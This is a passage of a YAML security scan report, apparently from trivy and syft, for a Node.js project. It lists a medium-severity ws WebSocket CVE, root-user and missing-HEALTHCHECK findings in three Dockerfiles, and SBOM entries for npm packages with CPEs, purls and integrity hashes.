nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 13.36426666666667 epss: 0.00058 epss_percentile: 0.1822 is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.00232 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 4aee8c6d135a7c0c ruleId: CVE-2026-45736 severity: MEDIUM tool: name: trivy version: unknown location: path: package-lock.json startLine: 0 message: ws is an open source WebSocket client and server for Node.js. Prior to ... title: CVE-2026-45736 description: ws is an open source WebSocket client and server for Node.js. Prior to 8.20.1, the websocket.close() implementation is vulnerable to uninitialized memory disclosure when a TypedArray is passed as the reason argument. This vulnerability is fixed in 8.20.1. remediation: https://avd.aquasec.com/nvd/cve-2026-45736 references: [] tags: - vulnerability - pkg:ws@8.18.3 risk: cwe: &id052 - CWE-908 raw: VulnerabilityID: CVE-2026-45736 VendorIDs: - GHSA-58qx-3vcg-4xpx PkgID: ws@8.18.3 PkgName: ws PkgIdentifier: PURL: pkg:npm/ws@8.18.3 UID: f8dc386179443300 InstalledVersion: 8.18.3 FixedVersion: 8.20.1 Status: fixed SeveritySource: ghsa PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-45736 DataSource: ID: ghsa Name: GitHub Security Advisory npm URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm Fingerprint: sha256:54b51dc0dfb29c3a34ed11a3c1a3c26e8c1546c9a2c83cff9b3d42b63d290b98 Title: ws is an open source WebSocket client and server for Node.js. Prior to ... Description: ws is an open source WebSocket client and server for Node.js. Prior to 8.20.1, the websocket.close() implementation is vulnerable to uninitialized memory disclosure when a TypedArray is passed as the reason argument. This vulnerability is fixed in 8.20.1. Severity: MEDIUM CweIDs: *id052 VendorSeverity: ghsa: 2 nvd: 3 CVSS: ghsa: V3Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N V3Score: 4.4 nvd: V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N V3Score: 7.5 References: - https://github.com/websockets/ws - https://github.com/websockets/ws/commit/c0327ec15a54d701eb6ccefaa8bef328cfc03086 - https://github.com/websockets/ws/security/advisories/GHSA-58qx-3vcg-4xpx - https://nvd.nist.gov/vuln/detail/CVE-2026-45736 PublishedDate: '2026-05-15T15:16:54.103Z' LastModifiedDate: '2026-05-19T14:39:20.353Z' context: sbom: name: ws version: 8.18.3 path: /package-lock.json compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 13.338133333333333 epss: 9.0e-05 epss_percentile: 0.00961 is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.00036 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: eba667be954e5b93 ruleId: Image user should not be 'root' severity: HIGH tool: name: trivy version: unknown location: path: Dockerfile.dev startLine: 0 message: Image user should not be 'root' title: Image user should not be 'root' description: Running containers with 'root' user can lead to a container escape situation. It is a best practice to run containers as non-root users, which can be done by adding a 'USER' statement to the Dockerfile. remediation: https://avd.aquasec.com/misconfig/ds-0002 references: [] tags: - misconfig raw: Type: Dockerfile Security Check ID: DS-0002 Title: Image user should not be 'root' Description: Running containers with 'root' user can lead to a container escape situation. It is a best practice to run containers as non-root users, which can be done by adding a 'USER' statement to the Dockerfile. Message: Specify at least 1 USER command in Dockerfile with non-root user as argument Namespace: builtin.dockerfile.DS002 Query: data.builtin.dockerfile.DS002.deny Resolution: Add 'USER ' line to the Dockerfile Severity: HIGH PrimaryURL: https://avd.aquasec.com/misconfig/ds-0002 References: - https://docs.docker.com/develop/develop-images/dockerfile_best-practices/ - https://avd.aquasec.com/misconfig/ds-0002 Status: FAIL CauseMetadata: Provider: Dockerfile Service: general compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 23.333333333333336 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 7 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 63eaab178df076b0 ruleId: No HEALTHCHECK defined severity: LOW tool: name: trivy version: unknown location: path: Dockerfile.dev startLine: 0 message: No HEALTHCHECK defined title: No HEALTHCHECK defined description: You should add HEALTHCHECK instruction in your docker container images to perform the health check on running containers. remediation: https://avd.aquasec.com/misconfig/ds-0026 references: [] tags: - misconfig raw: Type: Dockerfile Security Check ID: DS-0026 Title: No HEALTHCHECK defined Description: You should add HEALTHCHECK instruction in your docker container images to perform the health check on running containers. Message: Add HEALTHCHECK instruction in your Dockerfile Namespace: builtin.dockerfile.DS026 Query: data.builtin.dockerfile.DS026.deny Resolution: Add HEALTHCHECK instruction in Dockerfile Severity: LOW PrimaryURL: https://avd.aquasec.com/misconfig/ds-0026 References: - https://blog.aquasec.com/docker-security-best-practices - https://avd.aquasec.com/misconfig/ds-0026 Status: FAIL CauseMetadata: Provider: Dockerfile Service: general compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 6.666666666666666 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 2 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: e68d0bbfcfdade0c ruleId: Image user should not be 'root' severity: HIGH tool: name: trivy version: unknown location: path: Dockerfile.production startLine: 0 message: Image user should not be 'root' title: Image user should not be 'root' description: Running containers with 'root' user can lead to a container escape situation. It is a best practice to run containers as non-root users, which can be done by adding a 'USER' statement to the Dockerfile. remediation: https://avd.aquasec.com/misconfig/ds-0002 references: [] tags: - misconfig raw: Type: Dockerfile Security Check ID: DS-0002 Title: Image user should not be 'root' Description: Running containers with 'root' user can lead to a container escape situation. It is a best practice to run containers as non-root users, which can be done by adding a 'USER' statement to the Dockerfile. Message: Specify at least 1 USER command in Dockerfile with non-root user as argument Namespace: builtin.dockerfile.DS002 Query: data.builtin.dockerfile.DS002.deny Resolution: Add 'USER ' line to the Dockerfile Severity: HIGH PrimaryURL: https://avd.aquasec.com/misconfig/ds-0002 References: - https://docs.docker.com/develop/develop-images/dockerfile_best-practices/ - https://avd.aquasec.com/misconfig/ds-0002 Status: FAIL CauseMetadata: Provider: Dockerfile Service: general compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 23.333333333333336 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 7 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 7b29c0ae384e49f6 ruleId: No HEALTHCHECK defined severity: LOW tool: name: trivy version: unknown location: path: Dockerfile.production startLine: 0 message: No HEALTHCHECK defined title: No HEALTHCHECK defined description: You should add HEALTHCHECK instruction in your docker container images to perform the health check on running containers. remediation: https://avd.aquasec.com/misconfig/ds-0026 references: [] tags: - misconfig raw: Type: Dockerfile Security Check ID: DS-0026 Title: No HEALTHCHECK defined Description: You should add HEALTHCHECK instruction in your docker container images to perform the health check on running containers. Message: Add HEALTHCHECK instruction in your Dockerfile Namespace: builtin.dockerfile.DS026 Query: data.builtin.dockerfile.DS026.deny Resolution: Add HEALTHCHECK instruction in Dockerfile Severity: LOW PrimaryURL: https://avd.aquasec.com/misconfig/ds-0026 References: - https://blog.aquasec.com/docker-security-best-practices - https://avd.aquasec.com/misconfig/ds-0026 Status: FAIL CauseMetadata: Provider: Dockerfile Service: general compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 6.666666666666666 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 2 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: c5cf815654ece26c ruleId: Image user should not be 'root' severity: HIGH tool: name: trivy version: unknown location: path: Dockerfile.test startLine: 0 message: Image user should not be 'root' title: Image user should not be 'root' description: Running containers with 'root' user can lead to a container escape situation. It is a best practice to run containers as non-root users, which can be done by adding a 'USER' statement to the Dockerfile. remediation: https://avd.aquasec.com/misconfig/ds-0002 references: [] tags: - misconfig raw: Type: Dockerfile Security Check ID: DS-0002 Title: Image user should not be 'root' Description: Running containers with 'root' user can lead to a container escape situation. It is a best practice to run containers as non-root users, which can be done by adding a 'USER' statement to the Dockerfile. Message: Specify at least 1 USER command in Dockerfile with non-root user as argument Namespace: builtin.dockerfile.DS002 Query: data.builtin.dockerfile.DS002.deny Resolution: Add 'USER ' line to the Dockerfile Severity: HIGH PrimaryURL: https://avd.aquasec.com/misconfig/ds-0002 References: - https://docs.docker.com/develop/develop-images/dockerfile_best-practices/ - https://avd.aquasec.com/misconfig/ds-0002 Status: FAIL CauseMetadata: Provider: Dockerfile Service: general compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 23.333333333333336 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 7 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 09a592ef82d0362e ruleId: No HEALTHCHECK defined severity: LOW tool: name: trivy version: unknown location: path: Dockerfile.test startLine: 0 message: No HEALTHCHECK defined title: No HEALTHCHECK defined description: You should add HEALTHCHECK instruction in your docker container images to perform the health check on running containers. remediation: https://avd.aquasec.com/misconfig/ds-0026 references: [] tags: - misconfig raw: Type: Dockerfile Security Check ID: DS-0026 Title: No HEALTHCHECK defined Description: You should add HEALTHCHECK instruction in your docker container images to perform the health check on running containers. Message: Add HEALTHCHECK instruction in your Dockerfile Namespace: builtin.dockerfile.DS026 Query: data.builtin.dockerfile.DS026.deny Resolution: Add HEALTHCHECK instruction in Dockerfile Severity: LOW PrimaryURL: https://avd.aquasec.com/misconfig/ds-0026 References: - https://blog.aquasec.com/docker-security-best-practices - https://avd.aquasec.com/misconfig/ds-0026 Status: FAIL CauseMetadata: Provider: Dockerfile Service: general compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 6.666666666666666 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 2 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 18edd79c677235d0 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @alloc/quick-lru 5.2.0' title: '@alloc/quick-lru 5.2.0' description: 'Package discovered: @alloc/quick-lru 5.2.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 47af215a45bf2740 name: '@alloc/quick-lru' version: 5.2.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@alloc\/quick-lru:\@alloc\/quick-lru:5.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@alloc\/quick-lru:\@alloc\/quick_lru:5.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@alloc\/quick_lru:\@alloc\/quick-lru:5.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@alloc\/quick_lru:\@alloc\/quick_lru:5.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@alloc\/quick:\@alloc\/quick-lru:5.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@alloc\/quick:\@alloc\/quick_lru:5.2.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40alloc/quick-lru@5.2.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@alloc/quick-lru/-/quick-lru-5.2.0.tgz integrity: sha512-UrcABB+4bUrFABwbluTIBErXwvbsU/V7TZWfmbgJfbkwiBuziS9gxdODUyuiecfdGQ85jglMW6juS3+z5TsKLw== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 44b56e7441c56f19 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @babel/runtime 7.29.2' title: '@babel/runtime 7.29.2' description: 'Package discovered: @babel/runtime 7.29.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 77d76c145d8ae8f1 name: '@babel/runtime' version: 7.29.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@babel\/runtime:\@babel\/runtime:7.29.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40babel/runtime@7.29.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@babel/runtime/-/runtime-7.29.2.tgz integrity: sha512-JiDShH45zKHWyGe4ZNVRrCjBz8Nh9TMmZG1kh4QTK8hCBTWBi8Da+i7s1fJw7/lYpM4ccepSNfqzZ/QvABBi5g== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 87ac29aa779666c3 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @emnapi/runtime 1.10.0' title: '@emnapi/runtime 1.10.0' description: 'Package discovered: @emnapi/runtime 1.10.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 90f3b7ad1f28a06b name: '@emnapi/runtime' version: 1.10.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@emnapi\/runtime:\@emnapi\/runtime:1.10.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40emnapi/runtime@1.10.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@emnapi/runtime/-/runtime-1.10.0.tgz integrity: sha512-ewvYlk86xUoGI0zQRNq/mC+16R1QeDlKQy21Ki3oSYXNgLb45GV1P6A0M+/s6nyCuNDqe5VpaY84BzXGwVbwFA== dependencies: tslib: ^2.4.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 9dddf13ce7ce2b19 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @fastify/busboy 3.2.0' title: '@fastify/busboy 3.2.0' description: 'Package discovered: @fastify/busboy 3.2.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: c1858ce75e8e8799 name: '@fastify/busboy' version: 3.2.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@fastify\/busboy:\@fastify\/busboy:3.2.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40fastify/busboy@3.2.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@fastify/busboy/-/busboy-3.2.0.tgz integrity: sha512-m9FVDXU3GT2ITSe0UaMA5rU3QkfC/UXtCU8y0gSN/GugTqtVldOBWIB5V6V3sbmenVZUIpU6f+mPEO2+m5iTaA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 81749876eac20ae8 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @firebase/app-check-interop-types 0.3.2' title: '@firebase/app-check-interop-types 0.3.2' description: 'Package discovered: @firebase/app-check-interop-types 0.3.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 71780c9abc78bb02 name: '@firebase/app-check-interop-types' version: 0.3.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@firebase\/app-check-interop-types:\@firebase\/app-check-interop-types:0.3.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@firebase\/app-check-interop-types:\@firebase\/app_check_interop_types:0.3.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@firebase\/app_check_interop_types:\@firebase\/app-check-interop-types:0.3.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@firebase\/app_check_interop_types:\@firebase\/app_check_interop_types:0.3.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@firebase\/app-check-interop:\@firebase\/app-check-interop-types:0.3.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@firebase\/app-check-interop:\@firebase\/app_check_interop_types:0.3.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@firebase\/app_check_interop:\@firebase\/app-check-interop-types:0.3.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@firebase\/app_check_interop:\@firebase\/app_check_interop_types:0.3.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@firebase\/app-check:\@firebase\/app-check-interop-types:0.3.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@firebase\/app-check:\@firebase\/app_check_interop_types:0.3.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@firebase\/app_check:\@firebase\/app-check-interop-types:0.3.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@firebase\/app_check:\@firebase\/app_check_interop_types:0.3.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@firebase\/app:\@firebase\/app-check-interop-types:0.3.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@firebase\/app:\@firebase\/app_check_interop_types:0.3.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40firebase/app-check-interop-types@0.3.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@firebase/app-check-interop-types/-/app-check-interop-types-0.3.2.tgz integrity: sha512-LMs47Vinv2HBMZi49C09dJxp0QT5LwDzFaVGf/+ITHe3BlIhUiLNttkATSXplc89A2lAaeTqjgqVkiRfUGyQiQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: efa61bee7bbbbcb1 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @firebase/app-types 0.9.2' title: '@firebase/app-types 0.9.2' description: 'Package discovered: @firebase/app-types 0.9.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: a5bfafbacd41f0a2 name: '@firebase/app-types' version: 0.9.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@firebase\/app-types:\@firebase\/app-types:0.9.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@firebase\/app-types:\@firebase\/app_types:0.9.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@firebase\/app_types:\@firebase\/app-types:0.9.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@firebase\/app_types:\@firebase\/app_types:0.9.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@firebase\/app:\@firebase\/app-types:0.9.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@firebase\/app:\@firebase\/app_types:0.9.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40firebase/app-types@0.9.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@firebase/app-types/-/app-types-0.9.2.tgz integrity: sha512-oMEZ1TDlBz479lmABwWsWjzHwheQKiAgnuKxE0pz0IXCVx7/rtlkx1fQ6GfgK24WCrxDKMplZrT50Kh04iMbXQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 222f117f0d2bd962 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @firebase/auth-interop-types 0.2.3' title: '@firebase/auth-interop-types 0.2.3' description: 'Package discovered: @firebase/auth-interop-types 0.2.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 9b3141b15843b5a9 name: '@firebase/auth-interop-types' version: 0.2.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@firebase\/auth-interop-types:\@firebase\/auth-interop-types:0.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@firebase\/auth-interop-types:\@firebase\/auth_interop_types:0.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@firebase\/auth_interop_types:\@firebase\/auth-interop-types:0.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@firebase\/auth_interop_types:\@firebase\/auth_interop_types:0.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@firebase\/auth-interop:\@firebase\/auth-interop-types:0.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@firebase\/auth-interop:\@firebase\/auth_interop_types:0.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@firebase\/auth_interop:\@firebase\/auth-interop-types:0.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@firebase\/auth_interop:\@firebase\/auth_interop_types:0.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@firebase\/auth:\@firebase\/auth-interop-types:0.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@firebase\/auth:\@firebase\/auth_interop_types:0.2.3:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40firebase/auth-interop-types@0.2.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@firebase/auth-interop-types/-/auth-interop-types-0.2.3.tgz integrity: sha512-Fc9wuJGgxoxQeavybiuwgyi+0rssr76b+nHpj+eGhXFYAdudMWyfBHvFL/I5fEHniUM/UQdFzi9VXJK2iZF7FQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 89a01c3b3491a5d7 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @firebase/component 0.6.9' title: '@firebase/component 0.6.9' description: 'Package discovered: @firebase/component 0.6.9' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 23f944b79804e251 name: '@firebase/component' version: 0.6.9 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@firebase\/component:\@firebase\/component:0.6.9:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40firebase/component@0.6.9 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@firebase/component/-/component-0.6.9.tgz integrity: sha512-gm8EUEJE/fEac86AvHn8Z/QW8BvR56TBw3hMW0O838J/1mThYQXAIQBgUv75EqlCZfdawpWLrKt1uXvp9ciK3Q== dependencies: '@firebase/util': 1.10.0 tslib: ^2.1.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: ac38e7507aa172f9 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @firebase/database 1.0.8' title: '@firebase/database 1.0.8' description: 'Package discovered: @firebase/database 1.0.8' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 49e5593cb4d5046f name: '@firebase/database' version: 1.0.8 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@firebase\/database:\@firebase\/database:1.0.8:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40firebase/database@1.0.8 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@firebase/database/-/database-1.0.8.tgz integrity: sha512-dzXALZeBI1U5TXt6619cv0+tgEhJiwlUtQ55WNZY7vGAjv7Q1QioV969iYwt1AQQ0ovHnEW0YW9TiBfefLvErg== dependencies: '@firebase/app-check-interop-types': 0.3.2 '@firebase/auth-interop-types': 0.2.3 '@firebase/component': 0.6.9 '@firebase/logger': 0.4.2 '@firebase/util': 1.10.0 faye-websocket: 0.11.4 tslib: ^2.1.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: ed006e6af38f061f ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @firebase/database-compat 1.0.8' title: '@firebase/database-compat 1.0.8' description: 'Package discovered: @firebase/database-compat 1.0.8' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 2a2bae4730b1aafc name: '@firebase/database-compat' version: 1.0.8 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@firebase\/database-compat:\@firebase\/database-compat:1.0.8:*:*:*:*:*:*:* source: syft-generated - cpe: 